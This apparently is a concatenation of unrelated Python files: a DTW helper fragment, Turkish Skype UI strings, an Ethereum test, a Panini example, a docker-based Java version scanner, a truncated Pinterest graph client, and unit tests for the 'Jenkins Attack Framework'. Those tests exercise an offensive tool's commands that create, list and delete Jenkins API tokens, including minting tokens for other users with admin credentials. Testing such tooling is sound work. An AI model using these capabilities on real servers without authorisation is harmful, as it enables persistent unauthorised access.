"""
if implementation == 'librosa':
D, wp, E = librosa.sequence.dtw(C=C,
step_sizes_sigma=step_sizes,
weights_add=np.array([0, 0, 0]),
weights_mul=step_weights,
return_steps=True,
subseq=False)
wp = wp[::-1].T
elif implementation == 'synctoolbox':
dn = step_sizes[:, 0]
dm = step_sizes[:, 1]
D, E = __C_to_DE(C,
dn=dn,
dm=dm,
dw=step_weights,
sub_sequence=False)
wp = __E_to_warping_path(E=E,
dn=dn,
dm=dm,
sub_sequence=False)
else:
raise NotImplementedError(f'No implementation found called {implementation}')
return D, E, wp
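# Minimal usage sketch: run DTW on a tiny synthetic cost matrix (values chosen purely
# for illustration) and print the accumulated cost and the warping path.
if __name__ == "__main__":
    C = np.array([[0.0, 1.0, 2.0],
                  [1.0, 0.0, 1.0],
                  [2.0, 1.0, 0.0]])
    D, E, wp = compute_warping_path(C)
    print(D[-1, -1])  # total accumulated cost
    print(wp)         # optimal warping path as a 2 x L array of (row, column) indices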
|
56868
|
apiAttachAvailable = u'API Kullanilabilir'
apiAttachNotAvailable = u'Kullanilamiyor'
apiAttachPendingAuthorization = u'Yetkilendirme Bekliyor'
apiAttachRefused = u'Reddedildi'
apiAttachSuccess = u'Basarili oldu'
apiAttachUnknown = u'Bilinmiyor'
budDeletedFriend = u'Arkadas Listesinden Silindi'
budFriend = u'Arkadas'
budNeverBeenFriend = u'Arkadas Listesinde Hi\xe7 Olmadi'
budPendingAuthorization = u'Yetkilendirme Bekliyor'
budUnknown = u'Bilinmiyor'
cfrBlockedByRecipient = u'\xc7agri alici tarafindan engellendi'
cfrMiscError = u'Diger Hata'
cfrNoCommonCodec = u'Genel codec yok'
cfrNoProxyFound = u'Proxy bulunamadi'
cfrNotAuthorizedByRecipient = u'Ge\xe7erli kullanici alici tarafindan yetkilendirilmemis'
cfrRecipientNotFriend = u'Alici bir arkadas degil'
cfrRemoteDeviceError = u'Uzak ses aygitinda problem var'
cfrSessionTerminated = u'Oturum sonlandirildi'
cfrSoundIOError = u'Ses G/\xc7 hatasi'
cfrSoundRecordingError = u'Ses kayit hatasi'
cfrUnknown = u'Bilinmiyor'
cfrUserDoesNotExist = u'Kullanici/telefon numarasi mevcut degil'
cfrUserIsOffline = u'\xc7evrim Disi'
chsAllCalls = u'Eski Diyalog'
chsDialog = u'Diyalog'
chsIncomingCalls = u'\xc7oklu Sohbet Kabul\xfc Gerekli'
chsLegacyDialog = u'Eski Diyalog'
chsMissedCalls = u'Diyalog'
chsMultiNeedAccept = u'\xc7oklu Sohbet Kabul\xfc Gerekli'
chsMultiSubscribed = u'\xc7oklu Abonelik'
chsOutgoingCalls = u'\xc7oklu Abonelik'
chsUnknown = u'Bilinmiyor'
chsUnsubscribed = u'Aboneligi Silindi'
clsBusy = u'Mesgul'
clsCancelled = u'Iptal Edildi'
clsEarlyMedia = u'Early Media y\xfcr\xfct\xfcl\xfcyor'
clsFailed = u'\xdczg\xfcn\xfcz, arama basarisiz!'
clsFinished = u'Bitirildi'
clsInProgress = u'Arama Yapiliyor'
clsLocalHold = u'Yerel Beklemede'
clsMissed = u'Cevapsiz Arama'
clsOnHold = u'Beklemede'
clsRefused = u'Reddedildi'
clsRemoteHold = u'Uzak Beklemede'
clsRinging = u'ariyor'
clsRouting = u'Y\xf6nlendirme'
clsTransferred = u'Bilinmiyor'
clsTransferring = u'Bilinmiyor'
clsUnknown = u'Bilinmiyor'
clsUnplaced = u'Asla baglanmadi'
clsVoicemailBufferingGreeting = u'Selamlama Ara Bellege Aliniyor'
clsVoicemailCancelled = u'Sesli Posta Iptal Edildi'
clsVoicemailFailed = u'Sesli Mesaj Basarisiz'
clsVoicemailPlayingGreeting = u'Selamlama Y\xfcr\xfct\xfcl\xfcyor'
clsVoicemailRecording = u'Sesli Mesaj Kaydediliyor'
clsVoicemailSent = u'Sesli Posta G\xf6nderildi'
clsVoicemailUploading = u'Sesli Posta Karsiya Y\xfckleniyor'
cltIncomingP2P = u'Gelen Esler Arasi Telefon \xc7agrisi'
cltIncomingPSTN = u'Gelen Telefon \xc7agrisi'
cltOutgoingP2P = u'Giden Esler Arasi Telefon \xc7agrisi'
cltOutgoingPSTN = u'Giden Telefon \xc7agrisi'
cltUnknown = u'Bilinmiyor'
cmeAddedMembers = u'Eklenen \xdcyeler'
cmeCreatedChatWith = u'Sohbet Olusturuldu:'
cmeEmoted = u'Bilinmiyor'
cmeLeft = u'Birakilan'
cmeSaid = u'Ifade'
cmeSawMembers = u'G\xf6r\xfclen \xdcyeler'
cmeSetTopic = u'Konu Belirleme'
cmeUnknown = u'Bilinmiyor'
cmsRead = u'Okundu'
cmsReceived = u'Alindi'
cmsSending = u'G\xf6nderiliyor...'
cmsSent = u'G\xf6nderildi'
cmsUnknown = u'Bilinmiyor'
conConnecting = u'Baglaniyor'
conOffline = u'\xc7evrim Disi'
conOnline = u'\xc7evrim I\xe7i'
conPausing = u'Duraklatiliyor'
conUnknown = u'Bilinmiyor'
cusAway = u'Uzakta'
cusDoNotDisturb = u'Rahatsiz Etmeyin'
cusInvisible = u'G\xf6r\xfcnmez'
cusLoggedOut = u'\xc7evrim Disi'
cusNotAvailable = u'Kullanilamiyor'
cusOffline = u'\xc7evrim Disi'
cusOnline = u'\xc7evrim I\xe7i'
cusSkypeMe = u'Skype Me'
cusUnknown = u'Bilinmiyor'
cvsBothEnabled = u'Video G\xf6nderme ve Alma'
cvsNone = u'Video Yok'
cvsReceiveEnabled = u'Video Alma'
cvsSendEnabled = u'Video G\xf6nderme'
cvsUnknown = u''
grpAllFriends = u'T\xfcm Arkadaslar'
grpAllUsers = u'T\xfcm Kullanicilar'
grpCustomGroup = u'\xd6zel'
grpOnlineFriends = u'\xc7evrimi\xe7i Arkadaslar'
grpPendingAuthorizationFriends = u'Yetkilendirme Bekliyor'
grpProposedSharedGroup = u'Proposed Shared Group'
grpRecentlyContactedUsers = u'Son Zamanlarda Iletisim Kurulmus Kullanicilar'
grpSharedGroup = u'Shared Group'
grpSkypeFriends = u'Skype Arkadaslari'
grpSkypeOutFriends = u'SkypeOut Arkadaslari'
grpUngroupedFriends = u'Gruplanmamis Arkadaslar'
grpUnknown = u'Bilinmiyor'
grpUsersAuthorizedByMe = u'Tarafimdan Yetkilendirilenler'
grpUsersBlockedByMe = u'Engellediklerim'
grpUsersWaitingMyAuthorization = u'Yetkilendirmemi Bekleyenler'
leaAddDeclined = u'Ekleme Reddedildi'
leaAddedNotAuthorized = u'Ekleyen Kisinin Yetkisi Olmali'
leaAdderNotFriend = u'Ekleyen Bir Arkadas Olmali'
leaUnknown = u'Bilinmiyor'
leaUnsubscribe = u'Aboneligi Silindi'
leaUserIncapable = u'Kullanicidan Kaynaklanan Yetersizlik'
leaUserNotFound = u'Kullanici Bulunamadi'
olsAway = u'Uzakta'
olsDoNotDisturb = u'Rahatsiz Etmeyin'
olsNotAvailable = u'Kullanilamiyor'
olsOffline = u'\xc7evrim Disi'
olsOnline = u'\xc7evrim I\xe7i'
olsSkypeMe = u'Skype Me'
olsSkypeOut = u'SkypeOut'
olsUnknown = u'Bilinmiyor'
smsMessageStatusComposing = u'Composing'
smsMessageStatusDelivered = u'Delivered'
smsMessageStatusFailed = u'Failed'
smsMessageStatusRead = u'Read'
smsMessageStatusReceived = u'Received'
smsMessageStatusSendingToServer = u'Sending to Server'
smsMessageStatusSentToServer = u'Sent to Server'
smsMessageStatusSomeTargetsFailed = u'Some Targets Failed'
smsMessageStatusUnknown = u'Unknown'
smsMessageTypeCCRequest = u'Confirmation Code Request'
smsMessageTypeCCSubmit = u'Confirmation Code Submit'
smsMessageTypeIncoming = u'Incoming'
smsMessageTypeOutgoing = u'Outgoing'
smsMessageTypeUnknown = u'Unknown'
smsTargetStatusAcceptable = u'Acceptable'
smsTargetStatusAnalyzing = u'Analyzing'
smsTargetStatusDeliveryFailed = u'Delivery Failed'
smsTargetStatusDeliveryPending = u'Delivery Pending'
smsTargetStatusDeliverySuccessful = u'Delivery Successful'
smsTargetStatusNotRoutable = u'Not Routable'
smsTargetStatusUndefined = u'Undefined'
smsTargetStatusUnknown = u'Unknown'
usexFemale = u'Kadin'
usexMale = u'Erkek'
usexUnknown = u'Bilinmiyor'
vmrConnectError = u'Baglanti Hatasi'
vmrFileReadError = u'Dosya Okuma Hatasi'
vmrFileWriteError = u'Dosya Yazma Hatasi'
vmrMiscError = u'Diger Hata'
vmrNoError = u'Hata Yok'
vmrNoPrivilege = u'Sesli Posta \xd6nceligi Yok'
vmrNoVoicemail = u'B\xf6yle Bir Sesli Posta Yok'
vmrPlaybackError = u'Y\xfcr\xfctme Hatasi'
vmrRecordingError = u'Kayit Hatasi'
vmrUnknown = u'Bilinmiyor'
vmsBlank = u'Bos'
vmsBuffering = u'Ara bellege aliniyor'
vmsDeleting = u'Siliniyor'
vmsDownloading = u'Karsidan Y\xfckleniyor'
vmsFailed = u'Basarisiz Oldu'
vmsNotDownloaded = u'Karsidan Y\xfcklenmedi'
vmsPlayed = u'Y\xfcr\xfct\xfcld\xfc'
vmsPlaying = u'Y\xfcr\xfct\xfcl\xfcyor'
vmsRecorded = u'Kaydedildi'
vmsRecording = u'Sesli Mesaj Kaydediliyor'
vmsUnknown = u'Bilinmiyor'
vmsUnplayed = u'Y\xfcr\xfct\xfclmemis'
vmsUploaded = u'Karsiya Y\xfcklendi'
vmsUploading = u'Karsiya Y\xfckleniyor'
vmtCustomGreeting = u'\xd6zel Selamlama'
vmtDefaultGreeting = u'Varsayilan Selamlama'
vmtIncoming = u'gelen sesli mesaj'
vmtOutgoing = u'Giden'
vmtUnknown = u'Bilinmiyor'
vssAvailable = u'Kullanilabilir'
vssNotAvailable = u'Kullanilamiyor'
vssPaused = u'Duraklatildi'
vssRejected = u'Reddedildi'
vssRunning = u'\xc7alisiyor'
vssStarting = u'Basliyor'
vssStopping = u'Durduruluyor'
vssUnknown = u'Bilinmiyor'
|
56910
|
import random
import string
import unittest
import warnings
from libs import jenkinslib
from libs.JAF.BaseCommandLineParser import BaseCommandLineParser
from libs.JAF.plugin_CreateAPIToken import CreateAPIToken, CreateAPITokenParser
from libs.JAF.plugin_DeleteAPIToken import DeleteAPIToken, DeleteAPITokenParser
from libs.JAF.plugin_ListAPITokens import ListAPITokens, ListAPITokensParser
from .configuration import (
server,
user_admin,
user_bad,
user_noaccess,
user_normal,
user_read_job_access,
user_read_no_job_access,
)
from .helpers import DummyWebServer, TestFramework
class CreateAPITokenTest(unittest.TestCase, TestFramework):
def setUp(self):
warnings.simplefilter("ignore", ResourceWarning)
self.testcommand = "CreateAPIToken"
self.TestParserClass = CreateAPITokenParser
self.TestClass = CreateAPIToken
def test_invalid_url(self):
"""Make sure that calling with invalid url fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59321/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_bad_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins or right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_and_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins but right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "http://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_invalid_creds(self):
"""Make sure that calling with valid jenkins (but bad creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
    def test_valid_jenkins_anonymous_creds(self):
        """Make sure that calling with valid jenkins (but no creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_unprivileged_creds(self):
"""Make sure that calling with valid jenkins (unprivileged creds) returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_noaccess],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_normal_creds_with_user_argument(self):
"""Make sure that calling with valid jenkins (normal creds) and user flag returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_normal, "-U", user_admin],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
class CreateAPITokenParserTest(unittest.TestCase, TestFramework):
def setUp(self):
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
def test_no_args(self):
"""Ensure that calling with no arguments results in help output and not an error"""
self.basic_test_harness(
["jaf.py", self.testcommand],
[
r"usage: jaf.py {0} \[-h\]".format(self.testcommand),
r"Jenkins Attack Framework",
r"positional arguments:",
],
)
class DeleteAPITokenTest(unittest.TestCase, TestFramework):
def setUp(self):
warnings.simplefilter("ignore", ResourceWarning)
self.testcommand = "DeleteAPIToken"
self.TestParserClass = DeleteAPITokenParser
self.TestClass = DeleteAPIToken
def test_invalid_url(self):
"""Make sure that calling with invalid url fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59321/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_bad_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins or right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_and_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins but right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "http://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_invalid_creds(self):
"""Make sure that calling with valid jenkins (but bad creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
    def test_valid_jenkins_anonymous_creds(self):
        """Make sure that calling with valid jenkins (but no creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_unprivileged_creds(self):
"""Make sure that calling with valid jenkins (unprivileged creds) returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_noaccess],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_normal_creds_with_user_argument(self):
"""Make sure that calling with valid jenkins (normal creds) and user flag returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_normal, "-U", user_admin],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
class DeleteAPITokenParserTest(unittest.TestCase, TestFramework):
def setUp(self):
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
def test_no_args(self):
"""Ensure that calling with no arguments results in help output and not an error"""
self.basic_test_harness(
["jaf.py", self.testcommand],
[
r"usage: jaf.py {0} \[-h\]".format(self.testcommand),
r"Jenkins Attack Framework",
r"positional arguments:",
],
)
class ListAPITokensTest(unittest.TestCase, TestFramework):
def setUp(self):
warnings.simplefilter("ignore", ResourceWarning)
self.testcommand = "ListAPITokens"
self.TestParserClass = ListAPITokensParser
self.TestClass = ListAPITokens
def test_invalid_url(self):
"""Make sure that calling with invalid url fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59321/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_bad_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins or right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_and_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins but right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "http://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_invalid_creds(self):
"""Make sure that calling with valid jenkins (but bad creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
    def test_valid_jenkins_anonymous_creds(self):
        """Make sure that calling with valid jenkins (but no creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_unprivileged_creds(self):
"""Make sure that calling with valid jenkins (unprivileged creds) returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_noaccess],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
    def test_valid_jenkins_valid_read_no_job_creds_token_list(self):
        """Make sure that calling ListAPITokens with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_read_no_job_access],
[r"Current API Tokens:"],
)
def test_valid_jenkins_valid_normal_creds_with_user_argument(self):
"""Make sure that calling with valid jenkins (normal creds) and user flag returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_normal, "-U", user_admin],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
class ListAPITokensParserTest(unittest.TestCase, TestFramework):
def setUp(self):
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
def test_no_args(self):
"""Ensure that calling with no arguments results in help output and not an error"""
self.basic_test_harness(
["jaf.py", self.testcommand],
[
r"usage: jaf.py {0} \[-h\]".format(self.testcommand),
r"Jenkins Attack Framework",
r"positional arguments:",
],
)
class CombinedAPITokenNormalUserCredentialsTest(unittest.TestCase, TestFramework):
@classmethod
def setUpClass(cls):
cls.token_name = "testtoken" + "".join(
random.choices(string.ascii_letters + string.digits, k=26)
)
def test_1_valid_jenkins_valid_read_no_job_creds_token_create(self):
"""Make sure that calling CreateAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_read_no_job_access,
self.token_name,
],
[r"Your new API Token is: "],
)
    def test_2_valid_jenkins_valid_read_no_job_creds_token_list(self):
        """Make sure that calling ListAPITokens with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_read_no_job_access],
[r"Token Name: " + self.token_name],
)
def test_3_valid_jenkins_valid_read_no_job_creds_token_delete_list(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_read_no_job_access],
[r"Token Name: " + self.token_name],
)
def test_4_valid_jenkins_valid_read_no_job_creds_token_delete(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_read_no_job_access,
self.token_name,
],
[r"Token Deleted Successfully."],
)
# For now this is commented out because we can only test this on a cloudbees federated setup, which we don't have
'''
class CombinedAPITokenNormalUserCookieTest(unittest.TestCase, TestFramework):
"""
We need to specifically test auth with cookies because code has to do extra work to derive the logged-in user's username
"""
@classmethod
def setUpClass(cls):
cls.token_name = "testtoken" + "".join(
random.choices(string.ascii_letters + string.digits, k=26)
)
try:
js = jenkinslib.Jenkins(
server,
username=user_read_no_job_access.split(':')[0],
password=':'.join(user_read_no_job_access.split(':')[1:]),
timeout=30,
)
cls.cookie = js.get_cookie()
except Exception:
print(cls.cookie)
#Failure will cause tests to fail, so we ignore here
pass
def test_1_valid_jenkins_valid_read_no_job_creds_token_create(self):
"""Make sure that calling CreateAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
self.token_name,
],
[r"Your new API Token is: "],
)
    def test_2_valid_jenkins_valid_read_no_job_creds_token_list(self):
        """Make sure that calling ListAPITokens with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
],
[r"Token Name: " + self.token_name],
)
def test_3_valid_jenkins_valid_read_no_job_creds_token_delete_list(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
],
[r"Token Name: " + self.token_name],
)
def test_4_valid_jenkins_valid_read_no_job_creds_token_delete(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
self.token_name,
],
[r"Token Deleted Successfully."],
)
'''
class CombinedAPITokenAdminUserTest(unittest.TestCase, TestFramework):
@classmethod
def setUpClass(cls):
cls.token_name = "testtoken" + "".join(
random.choices(string.ascii_letters + string.digits, k=26)
)
def test_1_valid_jenkins_valid_admin_creds_token_create_other_user(self):
"""Make sure that calling CreateAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
self.token_name,
],
[r"Your new API Token is: "],
)
def test_2_valid_jenkins_valid_admin_creds_token_list_other_user(self):
"""Make sure that calling CreateAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
],
[r"Token Name: " + self.token_name],
)
def test_3_valid_jenkins_valid_admin_creds_token_delete_list_other_user(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
],
[r"Token Name: " + self.token_name],
)
def test_4_valid_jenkins_valid_admin_creds_token_delete_other_user(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
self.token_name,
],
[r"Token Deleted Successfully."],
)
if __name__ == "__main__":
unittest.main()
|
56912
|
import pytest
from ethereum import tester
@pytest.mark.xfail
def test_get_block_by_hash(rpc_server, rpc_client, eth_coinbase):
block_number = rpc_client.get_block_number()
assert block_number == 0
to_addr = "0x" + tester.encode_hex(tester.accounts[1])
txn_hash = rpc_client.send_transaction(_from=eth_coinbase, to=to_addr, value=100)
assert txn_hash
txn_receipt = rpc_client.get_transaction_receipt(txn_hash)
block_hash = txn_receipt['blockHash']
block = rpc_client.get_block_by_hash(block_hash)
assert block
|
56936
|
from panini import app as panini_app
from panini.middleware.debug_middleware import DebugMiddleware
app = panini_app.App(
service_name="debug_middleware_example",
host="127.0.0.1",
port=4222,
)
message = {
"key1": "value1",
"key2": 2,
"key3": 3.0,
"key4": [1, 2, 3, 4],
"key5": {"1": 1, "2": 2, "3": 3, "4": 4, "5": 5},
"key6": {"subkey1": "1", "subkey2": 2, "3": 3, "4": 4, "5": 5},
"key7": None,
}
@app.task()
async def publish():
for _ in range(10):
await app.request(subject="some.publish.subject", message=message)
@app.listen("some.publish.subject")
async def receive_messages(msg):
return {"success": True}
if __name__ == "__main__":
app.add_middleware(DebugMiddleware, log_level="info")
app.start()
|
56939
|
import os
import pandas as pd
import re
import subprocess
df = pd.read_csv("analysis_output/base_image_version_count.csv")
print(df.head())
df = df[:25].copy()
java_version = []
for i in range(len(df)):
try:
run_cmd = "docker run " + df["base-image:version"][i] + " java -version"
result = subprocess.check_output(run_cmd, stderr=subprocess.STDOUT, shell=True)
result = result.decode("utf-8")
if "openjdk version" in result:
java_version.append(re.findall(r"openjdk version.*\"", result)[0])
elif "java version" in result:
java_version.append(re.findall(r"java version.*\"", result)[0])
else:
java_version.append("")
except subprocess.CalledProcessError as exc:
print("ERROR CODE", exc.returncode, exc.output)
java_version.append("")
df["java_version"] = java_version
print(df)
df.to_csv(r'analysis_output/base_image_version_count_java.csv', index=False)
|
56957
|
import json
import httplib2
from graphipy.graph.graph_base import BaseNode as Node, BaseEdge as Edge
class Pinterest:
def __init__(self, api):
self.access_token = api["access_token"]
# get a single user info in JSON format by username
def get_single_user(self, username):
url = "https://api.pinterest.com/v1/users/" + username + "/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get a single board info in JSON format by board_url
def get_single_board(self, board_url):
url = "https://api.pinterest.com/v1/boards/" + board_url + "/?access_token=" + self.access_token + \
"&fields=id%2Cname%2Curl%2Ccounts%2Ccreated_at%2Ccreator%2Cdescription%2Cimage%2Cprivacy"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get a single pin info in JSON format by pin_id
def get_single_pin(self, pin_id):
url = "https://api.pinterest.com/v1/pins/" + pin_id + "/?access_token=" + self.access_token + \
"&fields=id%2Clink%2Cnote%2Curl%2Cattribution%2Cboard%2Ccolor%2Coriginal_link%2Ccounts%2Ccreated_at%2Ccreator%2Cimage%2Cmedia"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get all pins on one board in JSON format by board_url
def get_pins_from_board(self, board_url):
url = "https://api.pinterest.com/v1/boards/" + board_url + \
"/pins/?access_token=" + self.access_token + "&fields=id"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get the graph for a single user by username
def fetch_pinterest_user_by_username(self, graph, username):
result = self.get_single_user(username)
user = PinterestUser(result["data"])
graph.create_node(user)
# get the graph for a single board by board_url
def fetch_pinterest_board_by_url(self, graph, board_url):
board_result = self.get_single_board(board_url)
board = PinterestBoard(board_result["data"])
graph.create_node(board)
creator_username = board_result["data"]["creator"]["url"].split('/')[3]
user_result = self.get_single_user(creator_username)
user = PinterestUser(user_result["data"])
graph.create_node(user)
graph.create_edge(Edge(board.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), board.get_id(), "CREATED"))
pin_result = self.get_pins_from_board(board_url)
for pin in pin_result["data"]:
single_pin_result = self.get_single_pin(pin["id"])
single_pin = PinterestPin(single_pin_result["data"])
graph.create_node(single_pin)
graph.create_edge(Edge(board.get_id(), single_pin.get_id(), "HAS"))
graph.create_edge(Edge(single_pin.get_id(), board.get_id(), "ON"))
# get the graph for a single pin by pin_id
def fetch_pinterest_pin_by_id(self, graph, pin_id):
pin_result = self.get_single_pin(pin_id)
pin = PinterestPin(pin_result["data"])
graph.create_node(pin)
creator_username = pin_result["data"]["creator"]["url"].split('/')[3]
user_result = self.get_single_user(creator_username)
user = PinterestUser(user_result["data"])
graph.create_node(user)
graph.create_edge(Edge(pin.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), pin.get_id(), "CREATED"))
board_url = pin_result["data"]["board"]["url"].split(
'/')[3] + "/" + pin_result["data"]["board"]["url"].split('/')[4]
board_result = self.get_single_board(board_url)
board = PinterestBoard(board_result["data"])
graph.create_node(board)
graph.create_edge(Edge(pin.get_id(), board.get_id(), "ON"))
graph.create_edge(Edge(board.get_id(), pin.get_id(), "HAS"))
# get the graph for mine as user node
def fetch_pinterest_my_usernode(self, graph):
